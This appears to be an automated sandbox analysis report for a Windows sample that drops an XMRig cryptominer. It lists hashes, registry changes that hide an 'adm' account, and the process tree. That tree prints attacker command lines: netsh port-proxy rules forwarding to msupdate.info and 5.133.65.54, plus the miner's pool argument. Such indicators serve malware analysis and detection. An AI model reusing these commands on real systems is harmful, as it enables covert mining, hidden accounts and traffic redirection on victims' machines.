Analysis
-
max time kernel
94s -
max time network
128s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
18-05-2022 18:12
Static task
static1
Behavioral task
behavioral1
Sample
556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe
Resource
win10-20220414-en
General
-
Target
556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe
-
Size
397KB
-
MD5
f87b5521fc916942a30df0be6529a059
-
SHA1
2881b9d73a93606a30b00fdd63723b4c8921c692
-
SHA256
556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402
-
SHA512
a45c1f4f9abe397e332612b727733cdf02f2092b77081a86765aa2e4d02bf7290b12d03cf10ecaf3129bcd95cc75692b3ff1459443af0156e5cd8f673793ac82
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe xmrig C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe xmrig C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
$77_oracle.exe$77_oracle.exepid process 4468 $77_oracle.exe 3452 $77_oracle.exe -
Sets file execution options in registry 2 TTPs
-
Modifies WinLogon 2 TTPs 3 IoCs
Processes:
556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0" 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe -
Modifies powershell logging option 1 TTPs
-
Drops file in Windows directory 2 IoCs
Processes:
556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exedescription ioc process File created C:\Windows\SoftwareDistribution\config.xml 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe File opened for modification C:\Windows\SoftwareDistribution\config.xml 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXENETSTAT.EXEpid process 4868 NETSTAT.EXE 5024 NETSTAT.EXE 1068 NETSTAT.EXE 904 NETSTAT.EXE 972 NETSTAT.EXE 1344 NETSTAT.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exepid process 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 632 632 -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exemsiexec.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXE$77_oracle.exeNETSTAT.EXENETSTAT.EXENETSTAT.EXE$77_oracle.exedescription pid process Token: SeDebugPrivilege 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe Token: SeSecurityPrivilege 5072 msiexec.exe Token: SeDebugPrivilege 4868 NETSTAT.EXE Token: SeDebugPrivilege 5024 NETSTAT.EXE Token: SeDebugPrivilege 1068 NETSTAT.EXE Token: SeLockMemoryPrivilege 4468 $77_oracle.exe Token: SeLockMemoryPrivilege 4468 $77_oracle.exe Token: SeDebugPrivilege 904 NETSTAT.EXE Token: SeDebugPrivilege 972 NETSTAT.EXE Token: SeDebugPrivilege 1344 NETSTAT.EXE Token: SeLockMemoryPrivilege 3452 $77_oracle.exe Token: SeLockMemoryPrivilege 3452 $77_oracle.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
$77_oracle.exe$77_oracle.exepid process 4468 $77_oracle.exe 3452 $77_oracle.exe -
Suspicious use of WriteProcessMemory 40 IoCs
Processes:
556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.execsc.exedescription pid process target process PID 2388 wrote to memory of 4380 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe csc.exe PID 2388 wrote to memory of 4380 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe csc.exe PID 4380 wrote to memory of 2492 4380 csc.exe cvtres.exe PID 4380 wrote to memory of 2492 4380 csc.exe cvtres.exe PID 2388 wrote to memory of 4708 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe chcp.com PID 2388 wrote to memory of 4708 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe chcp.com PID 2388 wrote to memory of 5004 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 5004 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 4868 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe NETSTAT.EXE PID 2388 wrote to memory of 4868 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe NETSTAT.EXE PID 2388 wrote to memory of 5024 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe NETSTAT.EXE PID 2388 wrote to memory of 5024 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe NETSTAT.EXE PID 2388 wrote to memory of 1068 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe NETSTAT.EXE PID 2388 wrote to memory of 1068 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe NETSTAT.EXE PID 2388 wrote to memory of 3684 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 3684 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 4792 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 4792 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 3120 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 3120 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 4244 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 4244 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 3264 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 3264 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 4468 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe $77_oracle.exe PID 2388 wrote to memory of 4468 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe $77_oracle.exe PID 2388 wrote to memory of 4632 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 4632 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 904 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe NETSTAT.EXE PID 2388 wrote to memory of 904 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe NETSTAT.EXE PID 2388 wrote to memory of 972 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe NETSTAT.EXE PID 2388 wrote to memory of 972 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe NETSTAT.EXE PID 2388 wrote to memory of 1344 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe NETSTAT.EXE PID 2388 wrote to memory of 1344 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe NETSTAT.EXE PID 2388 wrote to memory of 864 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 864 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 1964 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 1964 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 4600 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe PID 2388 wrote to memory of 4600 2388 556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe"C:\Users\Admin\AppData\Local\Temp\556667be48f0793351280485a3ac3a18599dc8084e16a06458d84baef5fc4402.exe"1⤵
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l8q1xfoe.cmdline"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6557.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6546.tmp"3⤵
-
C:\Windows\system32\chcp.com"C:\Windows\system32\chcp.com" 4372⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy reset2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe"C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe" -o 5.133.65.54:80 --http-port 888 -t 12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -na2⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.542⤵
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" interface portproxy show all2⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exeC:\Users\Admin\AppData\Local\Temp\$77_oracle.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exeFilesize
3.7MB
MD53b89f9f1e9932eee5a031b0266894f5f
SHA1c77b26bf58884507389cd1c5699174eec3459df2
SHA256757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
SHA51262eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exeFilesize
3.7MB
MD53b89f9f1e9932eee5a031b0266894f5f
SHA1c77b26bf58884507389cd1c5699174eec3459df2
SHA256757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
SHA51262eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exeFilesize
3.7MB
MD53b89f9f1e9932eee5a031b0266894f5f
SHA1c77b26bf58884507389cd1c5699174eec3459df2
SHA256757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
SHA51262eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
-
C:\Users\Admin\AppData\Local\Temp\RES6557.tmpFilesize
1KB
MD550583eef98407dfed62778db96019818
SHA147b4648887473b73d006b73f59c4ef7ce9260b05
SHA256c67a76d86887365737a23b80ce3ec3624478a6fff7e921c796325db19a6e83fe
SHA5122e4ffca7cdffeae1bb60b6cbd1d3f22346519da13f9f8bacf7c6e24516e9042247450fb78a61c9d026c8b777206772771e0beb476b6edde27db060cfb71fd7cf
-
C:\Users\Admin\AppData\Local\Temp\config.jsonFilesize
3KB
MD574fb175e205d74c162df04f8236ec94b
SHA157ccfe00ef11556ffa576c74eeecf3730659ae89
SHA2561fb2afa760aeaee7a0201e34a6ff5071d5755312d14132e8956e840eaae78dc9
SHA5128b7ab1c082a965b921f3a56a75e2190365e5b7f1519b4d8da9c78cded313ed151ed8967e9b0599077c284ea4127e0471ecdc936dd96ca624d5a9f5707ce54830
-
C:\Users\Admin\AppData\Local\Temp\l8q1xfoe.dllFilesize
3KB
MD54dc39f48249a4f0dc6a0a4c266c75e78
SHA124fff7b79ff13680178951a38d7f6be5decd9eb6
SHA256a2dd9f081c4b4b164865f7150f967a8a8a92b803390e14180bc0c6ac7ed25cf1
SHA512199a8842bc9c84ac2415863d796ba1d33d4e7df69f1990e4585891424f0e2875576235508dece0637dd7136d94c31715722fd8301aa819474b988bb603ee5d24
-
C:\Users\Admin\AppData\Local\Temp\l8q1xfoe.pdbFilesize
11KB
MD5d26fa21f78ab94af7a1ab143ef3df342
SHA1d2cc2b8db024ed7a374febe45f2d1c20c367596f
SHA256e5acc7d316e40a3126d5695f2b9acf1864863b7bced219134c73bbf5885026b2
SHA51255bba12b2e607b7c450666ccd4016a1c66707faf995782166c13de71ae212bea115e130d0e13a1b43e94991b75d65519016d4647c2699f085d815cb8262288b7
-
\??\c:\Users\Admin\AppData\Local\Temp\CSC6546.tmpFilesize
652B
MD5bb490b5c5e6d37210a13a67eab04df7c
SHA15033edf2db5c57170e9e992b3f7fb46afbe3a7b3
SHA2566d113d2d9eb5d018d916fe170afabbe86876a8886db501f2f0223eab654bed15
SHA512a5f5b6f3c168dcfdfd9739270a2e0e6d40f3ad638aa522e292cd7b39f39c5c9e80bd1f3b4db245c15e539ca955f34e31b324b37b2489a07a141d736ee90d89ec
-
\??\c:\Users\Admin\AppData\Local\Temp\l8q1xfoe.0.csFilesize
447B
MD51640a04633fee0dfdc7e22c4f4063bf6
SHA13cb525c47b5dd37f8ee45b034c9452265fba5476
SHA25655e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0
SHA51285c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d
-
\??\c:\Users\Admin\AppData\Local\Temp\l8q1xfoe.cmdlineFilesize
309B
MD5c567a2e3e9afe777f40ae93bd65333b4
SHA1e91a3600b068265c19c03234de1cf6aea218ff93
SHA256ec1618baeab26affd0b13c38011128bbb8dc38c2f23e41560c3586f77c3deb3f
SHA512dc00c7bc6bdcc8a560f07d2de641446dcde21c3cf887cd81e99c51242eea0eec919c0cc57ef8b841553378fa34487a1def32a6953bebdb0358a7044ff93f87d9
-
memory/864-144-0x0000000000000000-mapping.dmp
-
memory/904-141-0x0000000000000000-mapping.dmp
-
memory/972-142-0x0000000000000000-mapping.dmp
-
memory/1068-129-0x0000000000000000-mapping.dmp
-
memory/1344-143-0x0000000000000000-mapping.dmp
-
memory/1964-145-0x0000000000000000-mapping.dmp
-
memory/2388-114-0x00007FF8EFA30000-0x00007FF8F058D000-memory.dmpFilesize
11.4MB
-
memory/2388-152-0x000000000290A000-0x000000000290F000-memory.dmpFilesize
20KB
-
memory/2492-118-0x0000000000000000-mapping.dmp
-
memory/3120-132-0x0000000000000000-mapping.dmp
-
memory/3264-134-0x0000000000000000-mapping.dmp
-
memory/3452-151-0x0000014913090000-0x00000149130B0000-memory.dmpFilesize
128KB
-
memory/3452-150-0x0000014913050000-0x0000014913070000-memory.dmpFilesize
128KB
-
memory/3684-130-0x0000000000000000-mapping.dmp
-
memory/4244-133-0x0000000000000000-mapping.dmp
-
memory/4380-115-0x0000000000000000-mapping.dmp
-
memory/4468-138-0x00000210D4530000-0x00000210D4550000-memory.dmpFilesize
128KB
-
memory/4468-135-0x0000000000000000-mapping.dmp
-
memory/4468-139-0x00000210D5E40000-0x00000210D5E80000-memory.dmpFilesize
256KB
-
memory/4600-146-0x0000000000000000-mapping.dmp
-
memory/4632-140-0x0000000000000000-mapping.dmp
-
memory/4708-123-0x0000000000000000-mapping.dmp
-
memory/4792-131-0x0000000000000000-mapping.dmp
-
memory/4868-127-0x0000000000000000-mapping.dmp
-
memory/5004-126-0x0000000000000000-mapping.dmp
-
memory/5024-128-0x0000000000000000-mapping.dmp